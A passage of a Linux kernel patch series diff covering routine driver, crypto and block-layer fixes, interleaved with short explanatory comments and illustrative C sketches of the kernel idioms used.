++	} else if (!strncmp(page, "write through", 13) ||
++		 !strncmp(page, "none", 4)) {
+ 		blk_queue_flag_clear(QUEUE_FLAG_WC, q);
++	} else {
++		return -EINVAL;
++	}
+ 
+ 	return count;
+ }
+diff --git a/block/ioctl.c b/block/ioctl.c
+index 9c5f637ff153f..3c475e4166e9f 100644
+--- a/block/ioctl.c
++++ b/block/ioctl.c
+@@ -20,6 +20,8 @@ static int blkpg_do_ioctl(struct block_device *bdev,
+ 	struct blkpg_partition p;
+ 	long long start, length;
+ 
++	if (disk->flags & GENHD_FL_NO_PART)
++		return -EINVAL;
+ 	if (!capable(CAP_SYS_ADMIN))
+ 		return -EACCES;
+ 	if (copy_from_user(&p, upart, sizeof(struct blkpg_partition)))
+diff --git a/block/mq-deadline.c b/block/mq-deadline.c
+index f10c2a0d18d41..55e26065c2e27 100644
+--- a/block/mq-deadline.c
++++ b/block/mq-deadline.c
+@@ -622,8 +622,9 @@ static void dd_depth_updated(struct blk_mq_hw_ctx *hctx)
+ 	struct request_queue *q = hctx->queue;
+ 	struct deadline_data *dd = q->elevator->elevator_data;
+ 	struct blk_mq_tags *tags = hctx->sched_tags;
++	unsigned int shift = tags->bitmap_tags.sb.shift;
+ 
+-	dd->async_depth = max(1UL, 3 * q->nr_requests / 4);
++	dd->async_depth = max(1U, 3 * (1U << shift) / 4);
+ 
+ 	sbitmap_queue_min_shallow_depth(&tags->bitmap_tags, dd->async_depth);
+ }
+diff --git a/crypto/algapi.c b/crypto/algapi.c
+index 8c3a869cc43a9..5dc9ccdd5a510 100644
+--- a/crypto/algapi.c
++++ b/crypto/algapi.c
+@@ -17,6 +17,7 @@
+ #include <linux/rtnetlink.h>
+ #include <linux/slab.h>
+ #include <linux/string.h>
++#include <linux/workqueue.h>
+ 
+ #include "internal.h"
+ 
+@@ -74,15 +75,26 @@ static void crypto_free_instance(struct crypto_instance *inst)
+ 	inst->alg.cra_type->free(inst);
+ }
+ 
+-static void crypto_destroy_instance(struct crypto_alg *alg)
++static void crypto_destroy_instance_workfn(struct work_struct *w)
+ {
+-	struct crypto_instance *inst = (void *)alg;
++	struct crypto_instance *inst = container_of(w, struct crypto_instance,
++						    free_work);
+ 	struct crypto_template *tmpl = inst->tmpl;
+ 
+ 	crypto_free_instance(inst);
+ 	crypto_tmpl_put(tmpl);
+ }
+ 
++static void crypto_destroy_instance(struct crypto_alg *alg)
++{
++	struct crypto_instance *inst = container_of(alg,
++						    struct crypto_instance,
++						    alg);
++
++	INIT_WORK(&inst->free_work, crypto_destroy_instance_workfn);
++	schedule_work(&inst->free_work);
++}
++
+ /*
+  * This function adds a spawn to the list secondary_spawns which
+  * will be used at the end of crypto_remove_spawns to unregister
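
The algapi change above defers instance teardown to a workqueue, presumably so the actual free always runs in process context rather than wherever the last reference happens to be dropped. A hedged sketch of that general deferral pattern, with hypothetical names:

#include <linux/slab.h>
#include <linux/workqueue.h>

struct my_obj {
	struct work_struct free_work;
	/* ... payload ... */
};

static void my_obj_free_workfn(struct work_struct *w)
{
	struct my_obj *obj = container_of(w, struct my_obj, free_work);

	/* teardown that needs process context goes here */
	kfree(obj);
}

/* Called from wherever the last reference is dropped. */
static void my_obj_release(struct my_obj *obj)
{
	INIT_WORK(&obj->free_work, my_obj_free_workfn);
	schedule_work(&obj->free_work);
}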
+diff --git a/crypto/asymmetric_keys/x509_public_key.c b/crypto/asymmetric_keys/x509_public_key.c
+index 0b4943a4592b7..1815024bead38 100644
+--- a/crypto/asymmetric_keys/x509_public_key.c
++++ b/crypto/asymmetric_keys/x509_public_key.c
+@@ -117,6 +117,11 @@ int x509_check_for_self_signed(struct x509_certificate *cert)
+ 			goto out;
+ 	}
+ 
++	if (cert->unsupported_sig) {
++		ret = 0;
++		goto out;
++	}
++
+ 	ret = public_key_verify_signature(cert->pub, cert->sig);
+ 	if (ret < 0) {
+ 		if (ret == -ENOPKG) {
+diff --git a/crypto/rsa-pkcs1pad.c b/crypto/rsa-pkcs1pad.c
+index 3237b50baf3c5..1cf267bc6f9ea 100644
+--- a/crypto/rsa-pkcs1pad.c
++++ b/crypto/rsa-pkcs1pad.c
+@@ -575,6 +575,10 @@ static int pkcs1pad_init_tfm(struct crypto_akcipher *tfm)
+ 		return PTR_ERR(child_tfm);
+ 
+ 	ctx->child = child_tfm;
++
++	akcipher_set_reqsize(tfm, sizeof(struct pkcs1pad_request) +
++				  crypto_akcipher_reqsize(child_tfm));
++
+ 	return 0;
+ }
+ 
+@@ -670,7 +674,6 @@ static int pkcs1pad_create(struct crypto_template *tmpl, struct rtattr **tb)
+ 	inst->alg.set_pub_key = pkcs1pad_set_pub_key;
+ 	inst->alg.set_priv_key = pkcs1pad_set_priv_key;
+ 	inst->alg.max_size = pkcs1pad_get_max_size;
+-	inst->alg.reqsize = sizeof(struct pkcs1pad_request) + rsa_alg->reqsize;
+ 
+ 	inst->free = pkcs1pad_free;
+ 
+diff --git a/drivers/acpi/x86/s2idle.c b/drivers/acpi/x86/s2idle.c
+index e499c60c45791..ec84da6cc1bff 100644
+--- a/drivers/acpi/x86/s2idle.c
++++ b/drivers/acpi/x86/s2idle.c
+@@ -122,17 +122,16 @@ static void lpi_device_get_constraints_amd(void)
+ 			acpi_handle_debug(lps0_device_handle,
+ 					  "LPI: constraints list begin:\n");
+ 
+-			for (j = 0; j < package->package.count; ++j) {
++			for (j = 0; j < package->package.count; j++) {
+ 				union acpi_object *info_obj = &package->package.elements[j];
+ 				struct lpi_device_constraint_amd dev_info = {};
+ 				struct lpi_constraints *list;
+ 				acpi_status status;
+ 
+-				for (k = 0; k < info_obj->package.count; ++k) {
+-					union acpi_object *obj = &info_obj->package.elements[k];
++				list = &lpi_constraints_table[lpi_constraints_table_size];
+ 
+-					list = &lpi_constraints_table[lpi_constraints_table_size];
+-					list->min_dstate = -1;
++				for (k = 0; k < info_obj->package.count; k++) {
++					union acpi_object *obj = &info_obj->package.elements[k];
+ 
+ 					switch (k) {
+ 					case 0:
+@@ -148,27 +147,21 @@ static void lpi_device_get_constraints_amd(void)
+ 						dev_info.min_dstate = obj->integer.value;
+ 						break;
+ 					}
++				}
+ 
+-					if (!dev_info.enabled || !dev_info.name ||
+-					    !dev_info.min_dstate)
+-						continue;
++				if (!dev_info.enabled || !dev_info.name ||
++				    !dev_info.min_dstate)
++					continue;
+ 
+-					status = acpi_get_handle(NULL, dev_info.name,
+-								 &list->handle);
+-					if (ACPI_FAILURE(status))
+-						continue;
++				status = acpi_get_handle(NULL, dev_info.name, &list->handle);
++				if (ACPI_FAILURE(status))
++					continue;
+ 
+-					acpi_handle_debug(lps0_device_handle,
+-							  "Name:%s\n", dev_info.name);
++				acpi_handle_debug(lps0_device_handle,
++						  "Name:%s\n", dev_info.name);
+ 
+-					list->min_dstate = dev_info.min_dstate;
++				list->min_dstate = dev_info.min_dstate;
+ 
+-					if (list->min_dstate < 0) {
+-						acpi_handle_debug(lps0_device_handle,
+-								  "Incomplete constraint defined\n");
+-						continue;
+-					}
+-				}
+ 				lpi_constraints_table_size++;
+ 			}
+ 		}
+@@ -213,7 +206,7 @@ static void lpi_device_get_constraints(void)
+ 		if (!package)
+ 			continue;
+ 
+-		for (j = 0; j < package->package.count; ++j) {
++		for (j = 0; j < package->package.count; j++) {
+ 			union acpi_object *element =
+ 					&(package->package.elements[j]);
+ 
+@@ -245,7 +238,7 @@ static void lpi_device_get_constraints(void)
+ 
+ 		constraint->min_dstate = -1;
+ 
+-		for (j = 0; j < package_count; ++j) {
++		for (j = 0; j < package_count; j++) {
+ 			union acpi_object *info_obj = &info.package[j];
+ 			union acpi_object *cnstr_pkg;
+ 			union acpi_object *obj;
+diff --git a/drivers/amba/bus.c b/drivers/amba/bus.c
+index 110a535648d2e..0aa2d3111ae6e 100644
+--- a/drivers/amba/bus.c
++++ b/drivers/amba/bus.c
+@@ -534,6 +534,7 @@ static void amba_device_release(struct device *dev)
+ {
+ 	struct amba_device *d = to_amba_device(dev);
+ 
++	of_node_put(d->dev.of_node);
+ 	if (d->res.parent)
+ 		release_resource(&d->res);
+ 	mutex_destroy(&d->periphid_lock);
+diff --git a/drivers/ata/pata_arasan_cf.c b/drivers/ata/pata_arasan_cf.c
+index e89617ed9175b..46588fc829432 100644
+--- a/drivers/ata/pata_arasan_cf.c
++++ b/drivers/ata/pata_arasan_cf.c
+@@ -529,7 +529,8 @@ static void data_xfer(struct work_struct *work)
+ 	/* dma_request_channel may sleep, so calling from process context */
+ 	acdev->dma_chan = dma_request_chan(acdev->host->dev, "data");
+ 	if (IS_ERR(acdev->dma_chan)) {
+-		dev_err(acdev->host->dev, "Unable to get dma_chan\n");
++		dev_err_probe(acdev->host->dev, PTR_ERR(acdev->dma_chan),
++			      "Unable to get dma_chan\n");
+ 		acdev->dma_chan = NULL;
+ 		goto chan_request_fail;
+ 	}
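
dev_err_probe(), adopted above, both logs the failure (including the error code) and stays quiet for -EPROBE_DEFER, recording the deferral reason instead. A sketch of the usual one-line idiom, under hypothetical driver names:

#include <linux/dmaengine.h>
#include <linux/platform_device.h>

static int my_probe(struct platform_device *pdev)
{
	struct dma_chan *chan;

	chan = dma_request_chan(&pdev->dev, "data");
	if (IS_ERR(chan))
		return dev_err_probe(&pdev->dev, PTR_ERR(chan),
				     "Unable to get dma_chan\n");

	/* ... use the channel ... */
	return 0;
}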
+diff --git a/drivers/base/core.c b/drivers/base/core.c
+index e30223c2672fc..af90bfb0cc3d8 100644
+--- a/drivers/base/core.c
++++ b/drivers/base/core.c
+@@ -3855,6 +3855,17 @@ void device_del(struct device *dev)
+ 	device_platform_notify_remove(dev);
+ 	device_links_purge(dev);
+ 
++	/*
++	 * If a device does not have a driver attached, we need to clean
++	 * up any managed resources. We do this in device_release(), but
++	 * it's never called (and we leak the device) if a managed
++	 * resource holds a reference to the device. So release all
++	 * managed resources here, like we do in driver_detach(). We
++	 * still need to do so again in device_release() in case someone
++	 * adds a new resource after this point, though.
++	 */
++	devres_release_all(dev);
++
+ 	if (dev->bus)
+ 		blocking_notifier_call_chain(&dev->bus->p->bus_notifier,
+ 					     BUS_NOTIFY_REMOVED_DEVICE, dev);
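
The comment in the hunk above describes the cycle this breaks: a managed resource can pin a reference to the device, so device_release() never runs and the devres list is never freed; releasing devres in device_del() cuts the knot. For reference, a hedged sketch of how managed resources attach to a device's lifetime (hypothetical names):

#include <linux/device.h>
#include <linux/slab.h>
#include <linux/string.h>

static void my_cleanup(void *data)
{
	pr_info("devres cleanup for %s\n", (char *)data);
}

static int my_bind(struct device *dev)
{
	char *buf = devm_kzalloc(dev, 16, GFP_KERNEL);	/* freed for us */

	if (!buf)
		return -ENOMEM;
	strscpy(buf, "example", 16);

	/* run my_cleanup(buf) automatically when the device goes away */
	return devm_add_action_or_reset(dev, my_cleanup, buf);
}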
+diff --git a/drivers/base/dd.c b/drivers/base/dd.c
+index 97ab1468a8760..380a53b6aee81 100644
+--- a/drivers/base/dd.c
++++ b/drivers/base/dd.c
+@@ -674,6 +674,8 @@ re_probe:
+ 
+ 		device_remove(dev);
+ 		driver_sysfs_remove(dev);
++		if (dev->bus && dev->bus->dma_cleanup)
++			dev->bus->dma_cleanup(dev);
+ 		device_unbind_cleanup(dev);
+ 
+ 		goto re_probe;
+diff --git a/drivers/base/regmap/regcache-rbtree.c b/drivers/base/regmap/regcache-rbtree.c
+index fabf87058d80b..ae6b8788d5f3f 100644
+--- a/drivers/base/regmap/regcache-rbtree.c
++++ b/drivers/base/regmap/regcache-rbtree.c
+@@ -277,7 +277,7 @@ static int regcache_rbtree_insert_to_block(struct regmap *map,
+ 
+ 	blk = krealloc(rbnode->block,
+ 		       blklen * map->cache_word_size,
+-		       GFP_KERNEL);
++		       map->alloc_flags);
+ 	if (!blk)
+ 		return -ENOMEM;
+ 
+@@ -286,7 +286,7 @@ static int regcache_rbtree_insert_to_block(struct regmap *map,
+ 	if (BITS_TO_LONGS(blklen) > BITS_TO_LONGS(rbnode->blklen)) {
+ 		present = krealloc(rbnode->cache_present,
+ 				   BITS_TO_LONGS(blklen) * sizeof(*present),
+-				   GFP_KERNEL);
++				   map->alloc_flags);
+ 		if (!present)
+ 			return -ENOMEM;
+ 
+@@ -320,7 +320,7 @@ regcache_rbtree_node_alloc(struct regmap *map, unsigned int reg)
+ 	const struct regmap_range *range;
+ 	int i;
+ 
+-	rbnode = kzalloc(sizeof(*rbnode), GFP_KERNEL);
++	rbnode = kzalloc(sizeof(*rbnode), map->alloc_flags);
+ 	if (!rbnode)
+ 		return NULL;
+ 
+@@ -346,13 +346,13 @@ regcache_rbtree_node_alloc(struct regmap *map, unsigned int reg)
+ 	}
+ 
+ 	rbnode->block = kmalloc_array(rbnode->blklen, map->cache_word_size,
+-				      GFP_KERNEL);
++				      map->alloc_flags);
+ 	if (!rbnode->block)
+ 		goto err_free;
+ 
+ 	rbnode->cache_present = kcalloc(BITS_TO_LONGS(rbnode->blklen),
+ 					sizeof(*rbnode->cache_present),
+-					GFP_KERNEL);
++					map->alloc_flags);
+ 	if (!rbnode->cache_present)
+ 		goto err_free_block;
+ 
+diff --git a/drivers/base/test/test_async_driver_probe.c b/drivers/base/test/test_async_driver_probe.c
+index 929410d0dd6fe..3465800baa6c8 100644
+--- a/drivers/base/test/test_async_driver_probe.c
++++ b/drivers/base/test/test_async_driver_probe.c
+@@ -84,7 +84,7 @@ test_platform_device_register_node(char *name, int id, int nid)
+ 
+ 	pdev = platform_device_alloc(name, id);
+ 	if (!pdev)
+-		return NULL;
++		return ERR_PTR(-ENOMEM);
+ 
+ 	if (nid != NUMA_NO_NODE)
+ 		set_dev_node(&pdev->dev, nid);
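
The test fix above matters because this helper's callers check the result with IS_ERR(), for which a bare NULL reads as success. A short sketch of the ERR_PTR convention, with a hypothetical allocator:

#include <linux/err.h>
#include <linux/slab.h>

struct widget {
	int id;
};

static struct widget *widget_create(void)
{
	struct widget *w = kzalloc(sizeof(*w), GFP_KERNEL);

	if (!w)
		return ERR_PTR(-ENOMEM);	/* not NULL: callers test IS_ERR() */

	return w;
}

/* Caller side:
 *	w = widget_create();
 *	if (IS_ERR(w))
 *		return PTR_ERR(w);
 */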
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index d6f405763c56f..f2062c2a28da8 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -1984,7 +1984,7 @@ static int btusb_switch_alt_setting(struct hci_dev *hdev, int new_alts)
+ 		 * alternate setting.
+ 		 */
+ 		spin_lock_irqsave(&data->rxlock, flags);
+-		kfree_skb(data->sco_skb);
++		dev_kfree_skb_irq(data->sco_skb);
+ 		data->sco_skb = NULL;
+ 		spin_unlock_irqrestore(&data->rxlock, flags);
+ 
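
kfree_skb() is not safe with hardware interrupts disabled; inside the spin_lock_irqsave() section above, dev_kfree_skb_irq() queues the skb and defers the actual free to softirq context. A hedged sketch of the pattern (the struct mirrors the driver's fields but is hypothetical here):

#include <linux/skbuff.h>
#include <linux/spinlock.h>

struct my_data {
	spinlock_t rxlock;
	struct sk_buff *sco_skb;
};

static void drop_pending_skb(struct my_data *data)
{
	unsigned long flags;

	spin_lock_irqsave(&data->rxlock, flags);
	if (data->sco_skb)
		dev_kfree_skb_irq(data->sco_skb);	/* IRQ-safe: defers the free */
	data->sco_skb = NULL;
	spin_unlock_irqrestore(&data->rxlock, flags);
}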
+diff --git a/drivers/bluetooth/hci_nokia.c b/drivers/bluetooth/hci_nokia.c
+index 05f7f6de6863d..97da0b2bfd17e 100644
+--- a/drivers/bluetooth/hci_nokia.c
++++ b/drivers/bluetooth/hci_nokia.c
+@@ -734,7 +734,11 @@ static int nokia_bluetooth_serdev_probe(struct serdev_device *serdev)
+ 		return err;
+ 	}
+ 
+-	clk_prepare_enable(sysclk);
++	err = clk_prepare_enable(sysclk);
++	if (err) {
++		dev_err(dev, "could not enable sysclk: %d", err);
++		return err;
++	}
+ 	btdev->sysclk_speed = clk_get_rate(sysclk);
+ 	clk_disable_unprepare(sysclk);
+ 
+diff --git a/drivers/bus/imx-weim.c b/drivers/bus/imx-weim.c
+index 55d917bd1f3f8..64f9eacd1b38d 100644
+--- a/drivers/bus/imx-weim.c
++++ b/drivers/bus/imx-weim.c
+@@ -331,6 +331,12 @@ static int of_weim_notify(struct notifier_block *nb, unsigned long action,
+ 				 "Failed to setup timing for '%pOF'\n", rd->dn);
+ 
+ 		if (!of_node_check_flag(rd->dn, OF_POPULATED)) {
++			/*
++			 * Clear the flag before adding the device so that
++			 * fw_devlink doesn't skip adding consumers to this
++			 * device.
++			 */
++			rd->dn->fwnode.flags &= ~FWNODE_FLAG_NOT_DEVICE;
+ 			if (!of_platform_device_create(rd->dn, NULL, &pdev->dev)) {
+ 				dev_err(&pdev->dev,
+ 					"Failed to create child device '%pOF'\n",
+diff --git a/drivers/bus/ti-sysc.c b/drivers/bus/ti-sysc.c
+index 9b7268bae66ab..ac36b01cf6d5d 100644
+--- a/drivers/bus/ti-sysc.c
++++ b/drivers/bus/ti-sysc.c
+@@ -3125,7 +3125,7 @@ static int sysc_init_static_data(struct sysc *ddata)
+ 
+ 	match = soc_device_match(sysc_soc_match);
+ 	if (match && match->data)
+-		sysc_soc->soc = (int)match->data;
++		sysc_soc->soc = (enum sysc_soc)(uintptr_t)match->data;
+ 
+ 	/*
+ 	 * Check and warn about possible old incomplete dtb. We now want to see
+diff --git a/drivers/char/hw_random/iproc-rng200.c b/drivers/char/hw_random/iproc-rng200.c
+index 06bc060534d81..c0df053cbe4b2 100644
+--- a/drivers/char/hw_random/iproc-rng200.c
++++ b/drivers/char/hw_random/iproc-rng200.c
+@@ -182,6 +182,8 @@ static int iproc_rng200_probe(struct platform_device *pdev)
+ 		return PTR_ERR(priv->base);
+ 	}
+ 
++	dev_set_drvdata(dev, priv);
++
+ 	priv->rng.name = "iproc-rng200";
+ 	priv->rng.read = iproc_rng200_read;
+ 	priv->rng.init = iproc_rng200_init;
+@@ -199,6 +201,28 @@ static int iproc_rng200_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
++static int __maybe_unused iproc_rng200_suspend(struct device *dev)
++{
++	struct iproc_rng200_dev *priv = dev_get_drvdata(dev);
++
++	iproc_rng200_cleanup(&priv->rng);
++
++	return 0;
++}
++
++static int __maybe_unused iproc_rng200_resume(struct device *dev)
++{
++	struct iproc_rng200_dev *priv = dev_get_drvdata(dev);
++
++	iproc_rng200_init(&priv->rng);
++
++	return 0;
++}
++
++static const struct dev_pm_ops iproc_rng200_pm_ops = {
++	SET_SYSTEM_SLEEP_PM_OPS(iproc_rng200_suspend, iproc_rng200_resume)
++};
++
+ static const struct of_device_id iproc_rng200_of_match[] = {
+ 	{ .compatible = "brcm,bcm2711-rng200", },
+ 	{ .compatible = "brcm,bcm7211-rng200", },
+@@ -212,6 +236,7 @@ static struct platform_driver iproc_rng200_driver = {
+ 	.driver = {
+ 		.name		= "iproc-rng200",
+ 		.of_match_table = iproc_rng200_of_match,
++		.pm		= &iproc_rng200_pm_ops,
+ 	},
+ 	.probe		= iproc_rng200_probe,
+ };
+diff --git a/drivers/char/hw_random/nomadik-rng.c b/drivers/char/hw_random/nomadik-rng.c
+index e8f9621e79541..3774adf903a83 100644
+--- a/drivers/char/hw_random/nomadik-rng.c
++++ b/drivers/char/hw_random/nomadik-rng.c
+@@ -13,8 +13,6 @@
+ #include <linux/clk.h>
+ #include <linux/err.h>
+ 
+-static struct clk *rng_clk;
+-
+ static int nmk_rng_read(struct hwrng *rng, void *data, size_t max, bool wait)
+ {
+ 	void __iomem *base = (void __iomem *)rng->priv;
+@@ -36,21 +34,20 @@ static struct hwrng nmk_rng = {
+ 
+ static int nmk_rng_probe(struct amba_device *dev, const struct amba_id *id)
+ {
++	struct clk *rng_clk;
+ 	void __iomem *base;
+ 	int ret;
+ 
+-	rng_clk = devm_clk_get(&dev->dev, NULL);
++	rng_clk = devm_clk_get_enabled(&dev->dev, NULL);
+ 	if (IS_ERR(rng_clk)) {
+ 		dev_err(&dev->dev, "could not get rng clock\n");
+ 		ret = PTR_ERR(rng_clk);
+ 		return ret;
+ 	}
+ 
+-	clk_prepare_enable(rng_clk);
+-
+ 	ret = amba_request_regions(dev, dev->dev.init_name);
+ 	if (ret)
+-		goto out_clk;
++		return ret;
+ 	ret = -ENOMEM;
+ 	base = devm_ioremap(&dev->dev, dev->res.start,
+ 			    resource_size(&dev->res));
+@@ -64,15 +61,12 @@ static int nmk_rng_probe(struct amba_device *dev, const struct amba_id *id)
+ 
+ out_release:
+ 	amba_release_regions(dev);
+-out_clk:
+-	clk_disable_unprepare(rng_clk);
+ 	return ret;
+ }
+ 
+ static void nmk_rng_remove(struct amba_device *dev)
+ {
+ 	amba_release_regions(dev);
+-	clk_disable_unprepare(rng_clk);
+ }
+ 
+ static const struct amba_id nmk_rng_ids[] = {
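
devm_clk_get_enabled(), adopted above, folds devm_clk_get() plus clk_prepare_enable() into one managed call: the clock is disabled, unprepared and put automatically on unbind, which is why the out_clk unwind label, the remove-path cleanup and the file-scope clk pointer can all go. A sketch of the resulting probe shape (hypothetical names):

#include <linux/clk.h>
#include <linux/platform_device.h>

static int my_probe(struct platform_device *pdev)
{
	struct clk *clk;

	clk = devm_clk_get_enabled(&pdev->dev, NULL);
	if (IS_ERR(clk))
		return dev_err_probe(&pdev->dev, PTR_ERR(clk),
				     "could not get/enable clock\n");

	/* clock guaranteed running from here until the device unbinds */
	return 0;
}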
+diff --git a/drivers/char/hw_random/pic32-rng.c b/drivers/char/hw_random/pic32-rng.c
+index 99c8bd0859a14..e04a054e89307 100644
+--- a/drivers/char/hw_random/pic32-rng.c
++++ b/drivers/char/hw_random/pic32-rng.c
+@@ -36,7 +36,6 @@
+ struct pic32_rng {
+ 	void __iomem	*base;
+ 	struct hwrng	rng;
+-	struct clk	*clk;
+ };
+ 
+ /*
+@@ -70,6 +69,7 @@ static int pic32_rng_read(struct hwrng *rng, void *buf, size_t max,
+ static int pic32_rng_probe(struct platform_device *pdev)
+ {
+ 	struct pic32_rng *priv;
++	struct clk *clk;
+ 	u32 v;
+ 	int ret;
+ 
+@@ -81,13 +81,9 @@ static int pic32_rng_probe(struct platform_device *pdev)
+ 	if (IS_ERR(priv->base))
+ 		return PTR_ERR(priv->base);
+ 
+-	priv->clk = devm_clk_get(&pdev->dev, NULL);
+-	if (IS_ERR(priv->clk))
+-		return PTR_ERR(priv->clk);
+-
+-	ret = clk_prepare_enable(priv->clk);
+-	if (ret)
+-		return ret;
++	clk = devm_clk_get_enabled(&pdev->dev, NULL);
++	if (IS_ERR(clk))
++		return PTR_ERR(clk);
+ 
+ 	/* enable TRNG in enhanced mode */
+ 	v = TRNGEN | TRNGMOD;
+@@ -98,15 +94,11 @@ static int pic32_rng_probe(struct platform_device *pdev)
+ 
+ 	ret = devm_hwrng_register(&pdev->dev, &priv->rng);
+ 	if (ret)
+-		goto err_register;
++		return ret;
+ 
+ 	platform_set_drvdata(pdev, priv);
+ 
+ 	return 0;
+-
+-err_register:
+-	clk_disable_unprepare(priv->clk);
+-	return ret;
+ }
+ 
+ static int pic32_rng_remove(struct platform_device *pdev)
+@@ -114,7 +106,6 @@ static int pic32_rng_remove(struct platform_device *pdev)
+ 	struct pic32_rng *rng = platform_get_drvdata(pdev);
+ 
+ 	writel(0, rng->base + RNGCON);
+-	clk_disable_unprepare(rng->clk);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/char/ipmi/ipmi_si_intf.c b/drivers/char/ipmi/ipmi_si_intf.c
+index abddd7e43a9a6..5cd031f3fc970 100644
+--- a/drivers/char/ipmi/ipmi_si_intf.c
++++ b/drivers/char/ipmi/ipmi_si_intf.c
+@@ -2082,6 +2082,11 @@ static int try_smi_init(struct smi_info *new_smi)
+ 		new_smi->io.io_cleanup = NULL;
+ 	}
+ 
++	if (rv && new_smi->si_sm) {
++		kfree(new_smi->si_sm);
++		new_smi->si_sm = NULL;
++	}
++
+ 	return rv;
+ }
+ 
+diff --git a/drivers/char/ipmi/ipmi_ssif.c b/drivers/char/ipmi/ipmi_ssif.c
+index d48061ec27dd9..248459f97c67b 100644
+--- a/drivers/char/ipmi/ipmi_ssif.c
++++ b/drivers/char/ipmi/ipmi_ssif.c
+@@ -1403,7 +1403,7 @@ static struct ssif_addr_info *ssif_info_find(unsigned short addr,
+ restart:
+ 	list_for_each_entry(info, &ssif_infos, link) {
+ 		if (info->binfo.addr == addr) {
+-			if (info->addr_src == SI_SMBIOS)
++			if (info->addr_src == SI_SMBIOS && !info->adapter_name)
+ 				info->adapter_name = kstrdup(adapter_name,
+ 							     GFP_KERNEL);
+ 
+@@ -1603,6 +1603,11 @@ static int ssif_add_infos(struct i2c_client *client)
+ 	info->addr_src = SI_ACPI;
+ 	info->client = client;
+ 	info->adapter_name = kstrdup(client->adapter->name, GFP_KERNEL);
++	if (!info->adapter_name) {
++		kfree(info);
++		return -ENOMEM;
++	}
++
+ 	info->binfo.addr = client->addr;
+ 	list_add_tail(&info->link, &ssif_infos);
+ 	return 0;
+diff --git a/drivers/char/tpm/tpm_crb.c b/drivers/char/tpm/tpm_crb.c
+index 7f7f3bded4535..db0b774207d35 100644
+--- a/drivers/char/tpm/tpm_crb.c
++++ b/drivers/char/tpm/tpm_crb.c
+@@ -463,28 +463,6 @@ static bool crb_req_canceled(struct tpm_chip *chip, u8 status)
+ 	return (cancel & CRB_CANCEL_INVOKE) == CRB_CANCEL_INVOKE;
+ }
+ 
+-static int crb_check_flags(struct tpm_chip *chip)
+-{
+-	u32 val;
+-	int ret;
+-
+-	ret = crb_request_locality(chip, 0);
+-	if (ret)
+-		return ret;
+-
+-	ret = tpm2_get_tpm_pt(chip, TPM2_PT_MANUFACTURER, &val, NULL);
+-	if (ret)
+-		goto release;
+-
+-	if (val == 0x414D4400U /* AMD */)
+-		chip->flags |= TPM_CHIP_FLAG_HWRNG_DISABLED;
+-
+-release:
+-	crb_relinquish_locality(chip, 0);
+-
+-	return ret;
+-}
+-
+ static const struct tpm_class_ops tpm_crb = {
+ 	.flags = TPM_OPS_AUTO_STARTUP,
+ 	.status = crb_status,
+@@ -826,9 +804,14 @@ static int crb_acpi_add(struct acpi_device *device)
+ 	if (rc)
+ 		goto out;
+ 
+-	rc = crb_check_flags(chip);
+-	if (rc)
+-		goto out;
++#ifdef CONFIG_X86
++	/* A quirk for https://www.amd.com/en/support/kb/faq/pa-410 */
++	if (boot_cpu_data.x86_vendor == X86_VENDOR_AMD &&
++	    priv->sm != ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON) {
++		dev_info(dev, "Disabling hwrng\n");
++		chip->flags |= TPM_CHIP_FLAG_HWRNG_DISABLED;
++	}
++#endif /* CONFIG_X86 */
+ 
+ 	rc = tpm_chip_register(chip);
+ 
+diff --git a/drivers/clk/Kconfig b/drivers/clk/Kconfig
+index 5da82f2bdd211..a5dcc7293a836 100644
+--- a/drivers/clk/Kconfig
++++ b/drivers/clk/Kconfig
+@@ -427,6 +427,7 @@ config COMMON_CLK_BD718XX
+ config COMMON_CLK_FIXED_MMIO
+ 	bool "Clock driver for Memory Mapped Fixed values"
+ 	depends on COMMON_CLK && OF
++	depends on HAS_IOMEM
+ 	help
+ 	  Support for Memory Mapped IO Fixed clocks
+ 
+diff --git a/drivers/clk/imx/clk-composite-8m.c b/drivers/clk/imx/clk-composite-8m.c
+index cbf0d7955a00a..3e9a092e136c1 100644
+--- a/drivers/clk/imx/clk-composite-8m.c
++++ b/drivers/clk/imx/clk-composite-8m.c
+@@ -97,7 +97,7 @@ static int imx8m_clk_composite_divider_set_rate(struct clk_hw *hw,
+ 	int prediv_value;
+ 	int div_value;
+ 	int ret;
+-	u32 val;
++	u32 orig, val;
+ 
+ 	ret = imx8m_clk_composite_compute_dividers(rate, parent_rate,
+ 						&prediv_value, &div_value);
+@@ -106,13 +106,15 @@ static int imx8m_clk_composite_divider_set_rate(struct clk_hw *hw,
+ 
+ 	spin_lock_irqsave(divider->lock, flags);
+ 
+-	val = readl(divider->reg);
+-	val &= ~((clk_div_mask(divider->width) << divider->shift) |
+-			(clk_div_mask(PCG_DIV_WIDTH) << PCG_DIV_SHIFT));
++	orig = readl(divider->reg);
++	val = orig & ~((clk_div_mask(divider->width) << divider->shift) |
++		       (clk_div_mask(PCG_DIV_WIDTH) << PCG_DIV_SHIFT));
+ 
+ 	val |= (u32)(prediv_value  - 1) << divider->shift;
+ 	val |= (u32)(div_value - 1) << PCG_DIV_SHIFT;
+-	writel(val, divider->reg);
++
++	if (val != orig)
++		writel(val, divider->reg);
+ 
+ 	spin_unlock_irqrestore(divider->lock, flags);
+ 
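
The divider change above is a read-modify-write that skips the register write entirely when the computed value equals what is already programmed, avoiding needless glitching on repeated rate sets. The same idiom as a generic, hedged helper:

#include <linux/io.h>
#include <linux/types.h>

static void update_field(void __iomem *reg, u32 mask, u32 new_bits)
{
	u32 orig, val;

	orig = readl(reg);
	val = (orig & ~mask) | (new_bits & mask);

	if (val != orig)	/* skip the write when nothing changes */
		writel(val, reg);
}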
+diff --git a/drivers/clk/imx/clk-imx8mp.c b/drivers/clk/imx/clk-imx8mp.c
+index 05c02f4e2a143..3d0d8f2c02dc1 100644
+--- a/drivers/clk/imx/clk-imx8mp.c
++++ b/drivers/clk/imx/clk-imx8mp.c
+@@ -177,10 +177,6 @@ static const char * const imx8mp_sai3_sels[] = {"osc_24m", "audio_pll1_out", "au
+ 						"video_pll1_out", "sys_pll1_133m", "osc_hdmi",
+ 						"clk_ext3", "clk_ext4", };
+ 
+-static const char * const imx8mp_sai4_sels[] = {"osc_24m", "audio_pll1_out", "audio_pll2_out",
+-						"video_pll1_out", "sys_pll1_133m", "osc_hdmi",
+-						"clk_ext1", "clk_ext2", };
+-
